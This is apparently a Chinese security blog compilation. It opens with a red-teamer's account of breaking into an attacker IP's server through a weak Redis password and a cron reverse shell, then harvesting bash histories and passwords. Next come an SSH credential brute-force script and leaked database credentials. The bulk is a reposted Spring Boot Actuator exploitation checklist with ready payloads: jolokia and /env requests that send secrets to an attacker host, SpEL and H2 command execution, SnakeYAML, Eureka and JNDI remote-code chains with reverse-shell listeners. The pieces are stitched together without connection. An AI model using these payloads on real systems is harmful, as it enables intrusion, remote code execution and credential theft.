一日,某护网红队支撑群里发了一份朔源报告,鸦雀无声
甲方:小伙伴们接集团要求需对 WAF全流量平台 攻击ip进行朔源…
领导1:溯源到攻击端信息是个新的领域,望小伙伴们通过此次集团安排做些尝试性学习和探索, 落实外部可借力工具和资源,[@Bin4xin废佬]也加入此次探索学习中。
领导2:文件:《全流量、WAF4月8日-4月12日攻击IP(1).xlsx》
$ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv
223.214.211.46
36.59.38.115
$ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv|wc -l
16570
于是废佬就开始了愉快 boring 的朔源之旅
鲁迅:
不会朔源的fofa安全工程师不是一个好的信息安全工程师
$ split -l 300 全流量、WAF4月8日-4月12日攻击IP\(1\).csv ips_preview_by300_
$ cat ips_preview_by300_aa|wc -l
300
$ ll
total 1400
drwxr-xr-x 59 bin4xin staff 1888 4 14 20:48 ./
drwxr-xr-x+ 43 bin4xin staff 1376 4 14 20:45 ../
-rw-r--r-- 1 bin4xin staff 4548 4 14 20:48 ips_preview_by300_aa
-rw-r--r-- 1 bin4xin staff 4457 4 14 20:48 ips_preview_by300_ab
-rw-r--r-- 1 bin4xin staff 4481 4 14 20:48 ips_preview_by300_ac
···
这样我们就有了若干个300行ip的小文件,更方便我们筛选我们需要的ip,NEXT。
just fofa:
欢乐而又短暂的上午如白驹过隙,一晃而过。
终于:发现了一些有趣的:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:03:b9:0b:7b:ab:3f:bf:cd:60:93:57:52:4e:a6:c5 (RSA)
| 256 9d:97:b5:fb:db:92:ed:a7:e3:dd:f9:5f:86:b5:e3:b4 (ECDSA)
|_ 256 7b:65:cf:48:84:15:82:ca:be:46:3c:cf:93:63:07:f1 (ED25519)
80/tcp open http nginx
| http-ls: Volume /
| SIZE TIME FILENAME
| - 24-Feb-2021 13:21 admin/
| - 24-Feb-2021 09:27 redis/
| - 24-Aug-2017 04:55 staragent/
| - 24-Feb-2021 08:44 www/
| - 24-Feb-2021 08:44 www/htdocs/
| - 13-Apr-2021 19:44 www/logs/
|_
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Index of /
888/tcp open http nginx
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: 404 Not Found
3306/tcp open mysql MySQL 5.5.62-log
6379/tcp open redis Redis key-value store
8080/tcp open http Apache Tomcat 8.5.63
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.63
8888/tcp open http Ajenti http control panel
8888+888端口;4月8日-4月12日攻击IP的IP, mysql & redis 均为弱口令。
$ ./redis-cli -h redis_target_ip
redis_target_ip:6379> get key
(error) NOAUTH Authentication required.
redis_target_ip:6379>
redis_target_ip:6379> auth 123456
OK
redis_target_ip:6379> get key
(nil)
redis_target_ip:6379> set xx "\n* * * * * bash -i >& /dev/tcp/your_vps_target/port 0>&1\n"
OK
redis_target_ip:6379> config set dir /var/spool/cron/
OK
redis_target_ip:6379> config set dbfilename root
OK
redis_target_ip:6379> save
OK
redis_target_ip:6379> quit
于是我们通过上面步骤获得了服务器权限;awesome ? next more awesome.
通过在服务器的信息搜集,似乎看到了19年刚刚接触服务器的自己,没有任何嘲讽的意思,所有人都是初学者过来的;
NO OFFENCE:-)Thanks
ps -ef|grep ssh|wc -l
50
$ cat /home/admin/.bash_history
sudo grep wordpress_admin_passwd /root/env.txt
/usr/local/mysql/bin/mysql -u root -p123456
sudo su rooe
sudo su root
sudo grep mysql_root_passwd /root/env.txt
mysql
alias mysql=/usr/local/mysql/bin/mysql
mysql
find / -name mysql.sock
sudo grep mysql_root_passwd /root/env.txt
msyql
sudo su root
grant all privileges on *.* to 'root'@'%' identified by 'pass-hidden';
grant all privileges on *.* to 'root'@'%' identified by '123456';
$ ps -ef|grep root
root 7963 1 0 Mar06 ? 00:39:39 /usr/bin/java -Djava.util.logging.config.file=/www/server/apache-tomcat-8.5.63/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -classpath /www/server/apache-tomcat-8.5.63/bin/bootstrap.jar:/www/server/apache-tomcat-8.5.63/bin/tomcat-juli.jar -Dcatalina.base=/www/server/apache-tomcat-8.5.63 -Dcatalina.home=/www/server/apache-tomcat-8.5.63 -Djava.io.tmpdir=/www/server/apache-tomcat-8.5.63/temp org.apache.catalina.startup.Bootstrap start
root 23017 1 0 Mar06 ? 00:00:00 nginx: master process nginx -c conf/nginx.conf
root 27803 1 0 Feb25 ? 01:17:18 ./redis-server *:6379
···
$ cat /root/.bash_history |grep tools
cd /www/server/panel && python tools.py panel pass-hidden
$ cat /www/server/panel/tools.py
if __name__ == "__main__":
type = sys.argv[1]
if type == 'root':
set_mysql_root(sys.argv[2])
elif type == 'panel':
set_panel_pwd(sys.argv[2])
所以,panel模式下对应的是面板密码设置;
至此,我们获得了 root、redis、mysql、BT panel ;而本文并炫技,我们的初衷是朔源:
作者:Bin4xin
转载请申明本文链接:《Bin4xin:我的网安从业朔源事件记录》
以上。
过完年回合肥已经接近一个月之久了,今年是本命年,也希望自己能够能够比20年更加努力。回了公司就按照计划忙些有意义的:
按照新年的规划,过来需要沉淀的便是Shiro框架。过完年回来就面临着护网,在20年靠着这个为公司护网“打下了一片江山”,今年应进一步理解;
说些没用的:
过年回来后,忙里偷闲与学校网安实验室的孩子们开了一次线下交流会,交流会的主要内容就是总结寒假以来的学习过程和心得汇报;因为年纪较小,基本都是刚大一、大二,所以偶尔也要进行大学生活困扰的解惑;
如何在现阶段的网安环境下,打造出一支专业化团队:
|__ 1、网安实验室是否能够成立CTF战队?
|__ 2、企业安全专业化安全服务团队?
$ su - employee64$ sudo -u programmer unshare写个脚本来批量跑试试看:
#!/bin/bash
pwn () {
read -p 'target ip: ' ip
sleep 2
for data in {1..100}
do
echo 'Try: ' $data
sshpass -p 'employee'$data ssh employee$data@$ip 'echo employee'$data' | sudo -S -l'
printf "\n"
done
}
pwn
for一下用户名密码{employee+$data}in{1..100},使用sshpass进行批量ssh连接认证,并尝试sudo;
失败如下:
[sudo] employee100 的密码:对不起,用户 employee100 不能在 localhost 上运行 sudo。
成功:
[sudo] employee64 的密码:匹配 %2$s 上 %1$s 的默认条目:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
用户 employee64 可以在 localhost 上运行以下命令:
(programmer) /usr/bin/unshare
所以用户employee64是拥有sudo权限;
[Wed Nov 25 17:19:33.475439 2020] [php7:notice] [pid 11872] [client 10.211.55.2:53568] PHP Notice: Undefined index: step in /var/www/
html/code/BabyOnline1/setup/setupwizard.php on line 4 [Wed Nov 25 17:19:33.475577 2020] [php7:error] [pid 11872] [client 10.211.55.2:53568]
PHP Fatal error: Uncaught Error: Class 'DOMDocument' not found in /var/www/html/code/BabyOnline1/setup/setupwizard.php:46\n
Stack trace:\n#0 {main}\n thrown in /var/www/html/code/BabyOnline1/setup/setupwizard.php on line 46
[Wed Nov 25 17:21:46.224793 2020] [php7:error] [pid 11882] [client 10.211.55.2:53602] PHP Fatal error: Uncaught Error:
Call to undefined function mysqli_connect() in
/var/www/html/code/BabyOnline1/utility/mysqli5.php:39\nStack trace:\n#0 /var/www/html/code/BabyOnline1/utility/fun.class.php(281):
Conn->__construct('localhost', '3306', 'root', 'tsinglink', 'qx_bbol', 'UTF8', true)\n#1 /var/www/html/code/BabyOnline1/utility/fun.class.php
(255): Utility->CreateDBConnect('localhost', '3306', 'root', 'tsinglink', 'qx_bbol', 'UTF8')\n#2 /var/www/html/code/BabyOnline1/platform/php/
ini.php(41): Utility->__construct()\n#3 /var/www/html/code/BabyOnline1/platform/php/plat_manage.php(5): require_once('/var/www/html/c...')
\n#4 {main}\n thrown in /var/www/html/code/BabyOnline1/utility/mysqli5.php on line 39, referer: http://10.211.55.4/platform/
提示在/var/www/html/code/BabyOnline1/utility/fun.class.php(281)文件、
/var/www/html/code/BabyOnline1/platform/php/ini.php(41)文件
/var/www/html/code/BabyOnline1/utility/mysqli5.php on line 39文件
第一个fun.class.php文件是实现的日志写入数据库的功能;
function WriterToDB($typeid,$clientAddress,$datetime,$file,$line,$function,$content)
{
global $utility;
if(is_array($content))
{
$conn = $utility->CreateDBConnect($_SESSION["DB"]["Host"],$_SESSION["DB"]["Port"],$_SESSION["DB"]["User"],$_SESSION["DB"]["Password"],$_SESSION["DB"]["Name"],$_SESSION["DB"]["Character"]);
$conn->Query("INSERT INTO `NMIOperationLog` (`Index`,`Operation`,`OperationTime`,`Description`,`ManageDomainUserInfo_Index`,`ManageDomain_Index`,`ManageDomainUserInfo_Identity`,`ManageDomains`,`SqlScript`)VALUES(null,'".$content["Operation"]."','".$content["OperationTime"]."','".addslashes($content["Description"])."','".$content["ManageDomainUserInfo_Index"]."','".$content["ManageDomain_Index"]."','".$content["ManageDomainUserInfo_Identity"]."','".$content["ManageDomains"]."','".addslashes($content["SqlScript"])."') ");
//$log->Writer(1,"NMI",strftime("%Y-%m-%d %H:%M:%S",time()),__FILE__,__LINE__,__FUNCTION__,mysql_error());
}
return true;
}
连库WriterToDB实现功能如上;同样的ini.php同样定义了数据库的配置信息包括类型、url和连接信息:
define('LOGSAVETYPE',1);
define('LOGLEVEL',1);
define('DB_TYPE', "mysql");
define('IMAGE_URL', "http://61.191.35.32:8580/BabyOnline/");
define('DB_SOURCEFILE_PATH',dirname(dirname(dirname(__FILE__)))."/utility/dbsource.ini");
dbsource.ini文件里面则详细配置了jdbc的配置信息,就不单独放出来了;再来看看最后一个文件,同样是连接数据库,然后发现了一些有趣的:
随意捡了一些构造函数:
function QueryRecordCount($sqlstr)
{
if($this->connect)
{
unset($row);
$row=$this->FetchArray($this->Query("SELECT count(1) as RecordCount FROM ".$sqlstr." "));
return ($row['RecordCount'] > 0 ? $row['RecordCount'] : 0);
}
else
{
return 0;
}
}
if($link->FetchArray($link->query("SELECT * FROM User WHERE `Identity`='$UserId' AND AreaCode='$AreaCode'")))
{
···
}
咳咳,跑偏了,以上来看就直接修改ini文件就行了。
在当今网络安全行业趋于商业化的时代,如何能够保持一颗赤忱之心:
教育行业应作为网络安全的”活水源头”,为这个年轻的行业输入足够的年轻血液,所以在此刻:
应当充分发挥教育职能的同时,对当下应用型、研究型专业的莘莘学子做有必要的引导;
因为当下很多学生、教师在当下行业无法认清自我,永远无法在正确的时间,做正确的事;
对处于实习期的学生做好职业引导,网络安全行业在未来十年不会成为国家命脉行业,安全行业仅仅作为安全服务的形式为大众所熟知,如今的网络安全行业:
国家层面:CTF赛事;护网行动;重大节日保障
企业层面:工信局部门检查;等保;自身企业业务安全保障(一般来说,越针对自身企业业务有安全需求的公司,都拥有自己的安全团队)
个人层面:个人数据、隐私、财产问题;
Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list
这是转载地址, 若作者介意请联系:「chihou.pro@gmail.com」删除转载文章
/ 开始,2.x 则统一以 /actuator 开始/manage、/management 或 项目相关名称 为根路径/env 有时候也会被程序员修改,如修改成 /appenvSpring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。
| 依赖项 | 版本列表及依赖组件版本 |
|---|---|
| spring-boot-starter-parent | spring-boot-starter-parent |
| spring-boot-dependencies | spring-boot-dependencies |
| spring-cloud-dependencies | spring-cloud-dependencies |
| Spring Cloud | Spring Boot |
|---|---|
| Angel | 兼容 Spring Boot 1.2.x |
| Brixton | 兼容 Spring Boot 1.3.x、1.4.x |
| Camden | 兼容 Spring Boot 1.4.x、1.5.x |
| Dalston | 兼容 Spring Boot 1.5.x,不兼容 2.0.x |
| Edgware | 兼容 Spring Boot 1.5.x,不兼容 2.0.x |
| Finchley | 兼容 Spring Boot 2.0.x,不兼容 1.5.x |
| Greenwich | 兼容 Spring Boot 2.1.x |
| Hoxton | 兼容 Spring Boot 2.2.x |
| 版本号后缀 | 含义 |
|---|---|
| BUILD-SNAPSHOT | 快照版,代码不是固定,处于变化之中 |
| MX | 里程碑版 |
| RCX | 候选发布版 |
| RELEASE | 正式发布版 |
| SRX | (修复错误和 bug 并再次发布的)正式发布版 |
开发环境切换为线上生产环境时,相关人员没有更改配置文件或忘记切换配置环境,导致此漏洞
直接访问以下几个路由,验证漏洞是否存在:
/api-docs
/v2/api-docs
/swagger-ui.html
一些可能会遇到的接口路由变形:
/api.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
除此之外,下面的路由有时也会包含(或推测出)一些接口地址信息,但是无法获得参数相关信息:
/mappings
/actuator/mappings
/metrics
/actuator/metrics
/beans
/actuator/beans
/configprops
/actuator/configprops
一般来讲,知道 spring boot 应用的相关接口和传参信息并不能算是漏洞;
但是可以检查暴露的接口是否存在未授权访问、越权或者其他业务型漏洞。
主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险,或者没有按照标准流程开发,忘记上线时需要修改/切换生产环境的配置
参考 production-ready-endpoints 和 spring-boot.txt,可能因为配置不当而暴露的默认内置路由可能会有:
/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
其中对寻找漏洞比较重要接口的有:
/env、/actuator/env
GET 请求 /env 会泄露环境变量信息,或者配置中的一些用户名,当程序员的属性名命名不规范 (例如 password 写成 psasword、pwd) 时,会泄露密码明文;
同时有一定概率可以通过 POST 请求 /env 接口设置一些属性,触发相关 RCE 漏洞。
/jolokia
通过 /jolokia/list 接口寻找可以利用的 MBean,触发相关 RCE 漏洞;
/trace
一些 http 请求包访问跟踪信息,有可能发现有效的 cookie 信息
访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果
/jolokia 或 /actuator/jolokia 接口jolokia-core 依赖(版本要求暂未知)GET 请求目标网站的 /env 或 /actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。
将下面示例中的 security.user.password 替换为实际要获取的属性名,直接发包;明文值结果包含在 response 数据包中的 value 键中。
org.springframework.boot Mbean(可能更通用)实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法
spring 1.x
POST /jolokia
Content-Type: application/json
{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
spring 2.x
POST /actuator/jolokia
Content-Type: application/json
{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
org.springframework.cloud.context.environment Mbean(需要 spring cloud 相关依赖)实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法
spring 1.x
POST /jolokia
Content-Type: application/json
{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
spring 2.x
POST /actuator/jolokia
Content-Type: application/json
{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果
/env/env/refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)spring-cloud-starter-netflix-eureka-client 依赖GET 请求目标网站的 /env 或 /actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。
在自己控制的外网服务器上监听 80 端口:
nc -lvk 80
将下面 http://value:${security.user.password}@your-vps-ip 中的 security.user.password 换成自己想要获取的对应的星号 * 遮掩的属性名;
your-vps-ip 换成自己外网服务器的真实 ip 地址。
spring 1.x
POST /env
Content-Type: application/x-www-form-urlencoded
eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip
spring 2.x
POST /actuator/env
Content-Type: application/json
{"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${security.user.password}@your-vps-ip"}
spring 1.x
POST /refresh
Content-Type: application/x-www-form-urlencoded
spring 2.x
POST /actuator/refresh
Content-Type: application/json
正常的话,此时 nc 监听的服务器会收到目标发来的请求,其中包含类似如下 Authorization 头内容:
Authorization: Basic dmFsdWU6MTIzNDU2
将其中的 dmFsdWU6MTIzNDU2部分使用 base64 解码,即可获得类似明文值 value:123456,其中的 123456 即是目标星号 * 脱敏前的属性值明文。
访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果
/env 设置属性触发目标对外网指定地址发起任意 http 请求参考 UUUUnotfound 提出的 issue-1,可以在目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据
GET 请求目标网站的 /env 或 /actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。
在自己控制的外网服务器上监听 80 端口:
nc -lvk 80
spring.cloud.bootstrap.location 方法(同时适用于明文数据中有特殊 url 字符的情况):spring 1.x
POST /env
Content-Type: application/x-www-form-urlencoded
spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password}
spring 2.x
POST /actuator/env
Content-Type: application/json
{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}
eureka.client.serviceUrl.defaultZone 方法(不适用于明文数据中有特殊 url 字符的情况):spring 1.x
POST /env
Content-Type: application/x-www-form-urlencoded
eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}
spring 2.x
POST /actuator/env
Content-Type: application/json
{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}
spring 1.x
POST /refresh
Content-Type: application/x-www-form-urlencoded
spring 2.x
POST /actuator/refresh
Content-Type: application/json
访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果
/heapdump 或 /actuator/heapdump 接口GET 请求目标网站的 /env 或 /actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。
下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G
GET 请求目标的 /heapdump 或 /actuator/heapdump 接口,下载应用实时的 JVM 堆信息
参考 文章 方法,使用 Eclipse Memory Analyzer 工具的 OQL 语句 select * from org.springframework.web.context.support.StandardServletEnvironment, 辅助快速过滤分析,获得密码明文
由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的,所以有些漏洞名字起的不太正规,以能区分为准
比如发现访问 /article?id=xxx ,页面会报状态码为 500 的错误: Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。
输入 /article?id=${7*7} ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。
由字符串格式转换成 0x** java 字节形式,方便执行任意代码:
# coding: utf-8
result = ""
target = 'open -a Calculator'
for x in target:
result += hex(ord(x)) + ","
print(result.rstrip(','))
执行 open -a Calculator 命令
${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
org.springframework.util.PropertyPlaceholderHelper 类中parseStringValue 方法进行递归解析${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞 SpringBoot SpEL表达式注入漏洞-分析与复现
repository/springboot-spel-rce
正常访问:
http://127.0.0.1:9091/article?id=66
执行 open -a Calculator 命令:
http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
/env 接口设置属性/refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)spring-cloud-starter 版本 < 1.3.0.RELEASE在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)
# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
在网站根目录下放置后缀为 yml 的文件 example.yml,内容如下:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://your-vps-ip/example.jar"]
]]
]
在网站根目录下放置后缀为 jar 的文件 example.jar,内容是要执行的代码,代码编写及编译方式参考 yaml-payload。
spring 1.x
POST /env
Content-Type: application/x-www-form-urlencoded
spring.cloud.bootstrap.location=http://your-vps-ip/example.yml
spring 2.x
POST /actuator/env
Content-Type: application/json
{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}
spring 1.x
POST /refresh
Content-Type: application/x-www-form-urlencoded
spring 2.x
POST /actuator/refresh
Content-Type: application/json
Exploit Spring Boot Actuator 之 Spring Cloud Env 学习笔记
repository/springcloud-snakeyaml-rce
正常访问:
http://127.0.0.1:9092/env
/env 接口设置属性/refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中)提供一个依赖 Flask 并符合要求的 python 脚本示例,作用是利用目标 Linux 机器上自带的 python 来反弹shell。
使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。
一般使用 nc 监听端口,等待反弹 shell
nc -lvp 443
spring 1.x
POST /env
Content-Type: application/x-www-form-urlencoded
eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example
spring 2.x
POST /actuator/env
Content-Type: application/json
{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/example"}
spring 1.x
POST /refresh
Content-Type: application/x-www-form-urlencoded
spring 2.x
POST /actuator/refresh
Content-Type: application/json
Spring Boot Actuator从未授权访问到getshell
repository/springboot-eureka-xstream-rce
正常访问:
http://127.0.0.1:9093/env
/jolokia 或 /actuator/jolokia 接口jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean目标可以请求攻击者的 HTTP 服务器(请求可出外网)
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。
在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)
# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
在根目录放置以 xml 结尾的 example.xml 文件,内容如下:
<configuration>
<insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" />
</configuration>
编写优化过后的用来反弹 shell 的 Java 示例代码 JNDIObject.java,
使用兼容低版本 jdk 的方式编译:
javac -source 1.5 -target 1.5 JNDIObject.java
然后将生成的 JNDIObject.class 文件拷贝到 步骤二 中的网站根目录。
下载 marshalsec ,使用下面命令架设对应的 ldap 服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
一般使用 nc 监听端口,等待反弹 shell
nc -lv 443
⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。
替换实际的 your-vps-ip 地址访问 URL 触发漏洞:
/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml
ch.qos.logback.classic.jmx.JMXConfigurator 类的 reloadByURL 方法logback 依赖的 insertFormJNDI 标签,设置了外部 JNDI 服务器地址 spring boot actuator rce via jolokia
repository/springboot-jolokia-logback-rce
正常访问:
http://127.0.0.1:9094/env
/jolokia 或 /actuator/jolokia 接口jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean访问 /jolokia/list 接口,查看是否存在 type=MBeanFactory 和 createJNDIRealm 关键词。
编写优化过后的用来反弹 shell 的 Java 示例代码 JNDIObject.java。
在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)
# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
将步骤二中编译好的 class 文件拷贝到 HTTP 服务器根目录。
下载 marshalsec ,使用下面命令架设对应的 rmi 服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389
一般使用 nc 监听端口,等待反弹 shell
nc -lvp 443
根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。
Yet Another Way to Exploit Spring Boot Actuators via Jolokia
repository/springboot-jolokia-logback-rce
正常访问:
http://127.0.0.1:9094/env
/env 接口设置属性/restart 接口重启应用(存在 spring-boot-starter-actuator 依赖)com.h2database.h2 依赖(版本要求暂未知)⚠️ 下面payload 中的 ‘T5’ 方法每一次执行命令后都需要更换名称 (如 T6) ,然后才能被重新创建使用,否则下次 restart 重启应用时漏洞不会被触发
spring 1.x(无回显执行命令)
POST /env
Content-Type: application/x-www-form-urlencoded
spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');
spring 2.x(无回显执行命令)
POST /actuator/env
Content-Type: application/json
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}
spring 1.x
POST /restart
Content-Type: application/x-www-form-urlencoded
spring 2.x
POST /actuator/restart
Content-Type: application/json
CREATE ALIAS 创建自定义函数的 SQL 语句 remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
repository/springboot-h2-database-rce
正常访问:
http://127.0.0.1:9096/actuator/env
com.h2database.h2 依赖(版本要求暂未知)spring.h2.console.enabled=true直接访问目标开启 h2 console 的默认路由 /h2-console,目标会跳转到页面 /h2-console/login.jsp?jsessionid=xxxxxx,记录下实际的 jsessionid=xxxxxx 值。
编写优化过后的用来反弹 shell 的 Java 示例代码 JNDIObject.java,
使用兼容低版本 jdk 的方式编译:
javac -source 1.5 -target 1.5 JNDIObject.java
然后将生成的 JNDIObject.class 文件拷贝到 步骤二 中的网站根目录。
在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)
# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
将步骤二中编译好的 class 文件拷贝到 HTTP 服务器根目录。
下载 marshalsec ,使用下面命令架设对应的 ldap 服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
一般使用 nc 监听端口,等待反弹 shell
nc -lv 443
根据实际情况,替换下面数据中的 jsessionid=xxxxxx、www.example.com 和 ldap://your-vps-ip:1389/JNDIObject
POST /h2-console/login.do?jsessionid=xxxxxx
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx
language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=javax.naming.InitialContext&url=ldap://your-vps-ip:1389/JNDIObject&user=&password=
repository/springboot-h2-database-rce
正常访问:
http://127.0.0.1:9096/h2-console
/env 接口设置属性/refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)mysql-connector-java 依赖GET 请求 /env 或 /actuator/env,搜索环境变量(classpath)中是否有 mysql-connector-java 关键词,并记录下其版本号(5.x 或 8.x);
搜索并观察环境变量中是否存在常见的反序列化 gadget 依赖,比如 commons-collections、Jdk7u21、Jdk8u20 等;
搜索 spring.datasource.url 关键词,记录下其 value 值,方便后续恢复其正常 jdbc url 值。
在自己控制的服务器上运行 springboot-jdbc-deserialization-rce.py 脚本,并使用 ysoserial 自定义要执行的命令:
java -jar ysoserial.jar CommonsCollections3 calc > payload.ser
在脚本同目录下生成 payload.ser 反序列化 payload 文件,供脚本使用。
